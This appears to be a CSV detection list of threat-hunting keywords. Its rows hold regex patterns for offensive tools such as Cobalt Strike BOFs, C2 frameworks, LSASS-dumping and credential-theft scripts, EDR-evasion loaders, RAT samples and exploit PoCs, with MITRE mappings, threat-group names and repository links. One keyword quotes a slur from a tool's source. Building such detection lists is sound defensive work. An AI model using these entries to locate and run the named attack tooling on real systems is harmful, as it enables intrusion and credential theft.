"*//Don't Recode & Decrypt it Niggas*",".{0,1000}\/\/Don\'t\sRecode\s\&\sDecrypt\sit\sNiggas.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#content","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","5055"
"*//Lh0St/InJ3C*",".{0,1000}\/\/Lh0St\/InJ3C.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","5056"
"*//localhost:1337*",".{0,1000}\/\/localhost\:1337.{0,1000}","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","10","1461","206","2025-03-25T03:30:16Z","2020-03-09T05:48:58Z","5057"
"*//MegaMedusa-DDoS-Machine*",".{0,1000}\/\/MegaMedusa\-DDoS\-Machine.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#content","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","5058"
"*//RRh0St/InJ3C*",".{0,1000}\/\/RRh0St\/InJ3C.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","5059"
"*//shuck.sh*",".{0,1000}\/\/shuck\.sh.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","5060"
"*//StaticSyscallsDump/*",".{0,1000}\/\/StaticSyscallsDump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","5061"
"*/_distutils_hack.zip*",".{0,1000}\/_distutils_hack\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","5062"
"*/_sish/api/clients*",".{0,1000}\/_sish\/api\/clients.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","5063"
"*/_sish/console*",".{0,1000}\/_sish\/console.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","5064"
"*/0d1n.c*",".{0,1000}\/0d1n\.c.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5066"
"*/0d1n_view*",".{0,1000}\/0d1n_view.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","5067"
"*/0nly1 RAT*/Client.exe*",".{0,1000}\/0nly1\sRAT\s.{0,1000}\/Client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5068"
"*/0nly1 RAT*/Server.exe *",".{0,1000}\/0nly1\sRAT\s.{0,1000}\/Server\.exe\s.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5069"
"*/0tt7/CVE-2022-23131*",".{0,1000}\/0tt7\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0004","N/A","N/A","Exploitation tool","https://github.com/0tt7/CVE-2022-23131","1","1","N/A","N/A","N/A","1","N/A","N/A","N/A","N/A","5070"
"*/0xdarkvortex-*",".{0,1000}\/0xdarkvortex\-.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","N/A","10","10","193","66","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z","5071"
"*/0xIronGoat/dirty-pipe*",".{0,1000}\/0xIronGoat\/dirty\-pipe.{0,1000}","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xIronGoat/dirty-pipe","1","1","N/A","N/A","N/A","1","10","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z","5072"
"*/0xthirteen/*",".{0,1000}\/0xthirteen\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","5073"
"*/0xthirteen/StayKit*",".{0,1000}\/0xthirteen\/StayKit.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","5074"
"*/1$a$$.exe*",".{0,1000}\/1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","1","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","5075"
"*/1.6-C2.git*",".{0,1000}\/1\.6\-C2\.git.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","1","N/A","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","5076"
"*/1/all_in_one.7z.torrent*",".{0,1000}\/1\/all_in_one\.7z\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","5077"
"*/1/all_in_one_p.7z*",".{0,1000}\/1\/all_in_one_p\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","5078"
"*/1/all_in_one_w.7z*",".{0,1000}\/1\/all_in_one_w\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","5079"
"*/10m_usernames.txt*",".{0,1000}\/10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","5080"
"*/11_Credentials.py*",".{0,1000}\/11_Credentials\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5081"
"*/13_NoseyParker.py*",".{0,1000}\/13_NoseyParker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5082"
"*/17_Custom_Cracklist.py*",".{0,1000}\/17_Custom_Cracklist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5083"
"*/1mxml/CVE-2022-23131*",".{0,1000}\/1mxml\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1190 - T1550 - T1078","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://github.com/1mxml/CVE-2022-23131","1","1","N/A","N/A","N/A","1","3","0","2022-02-19T03:14:47Z","2022-02-18T14:48:53Z","5084"
"*/1n73ction.php*",".{0,1000}\/1n73ction\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5085"
"*/365-Stealer.git*",".{0,1000}\/365\-Stealer\.git.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","5086"
"*/3DESEncryptor.go*",".{0,1000}\/3DESEncryptor\.go.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/TunnelGRE/Augustus","1","1","N/A","N/A","6","2","131","26","2024-07-27T14:47:45Z","2023-08-21T15:08:40Z","5087"
"*/3snake.git*",".{0,1000}\/3snake\.git.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","5094"
"*/4luc4rdr5290/CVE-2022-0847*",".{0,1000}\/4luc4rdr5290\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","N/A","1","4","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z","5095"
"*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*",".{0,1000}\/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","5096"
"*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*",".{0,1000}\/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","5097"
"*/888 RAT Private .exe*",".{0,1000}\/888\sRAT\sPrivate\s\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5098"
"*/9_DPAPI.py*",".{0,1000}\/9_DPAPI\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","5099"
"*/A7m3d Rat V.*.exe*",".{0,1000}\/A7m3d\sRat\sV\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5101"
"*/AbandonedCOMKeys/*",".{0,1000}\/AbandonedCOMKeys\/.{0,1000}","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","5103"
"*/ABPTTS.git*",".{0,1000}\/ABPTTS\.git.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","5104"
"*/acarsd-info.nse*",".{0,1000}\/acarsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5105"
"*/Accomplice.git*",".{0,1000}\/Accomplice\.git.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","5106"
"*/Ace RAT v*/Server.exe*",".{0,1000}\/Ace\sRAT\sv.{0,1000}\/Server\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5107"
"*/ACE_Get-KerberosTicketCache.ps1*",".{0,1000}\/ACE_Get\-KerberosTicketCache\.ps1.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","5108"
"*/AceLdr.cna*",".{0,1000}\/AceLdr\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","5109"
"*/AceRAT-Client.exe*",".{0,1000}\/AceRAT\-Client\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5110"
"*/ACEshark.git*",".{0,1000}\/ACEshark\.git.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","1","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","5111"
"*/ACEshark.py*",".{0,1000}\/ACEshark\.py.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","1","N/A","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","5112"
"*/acheron.git*",".{0,1000}\/acheron\.git.{0,1000}","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","N/A","4","326","39","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z","5113"
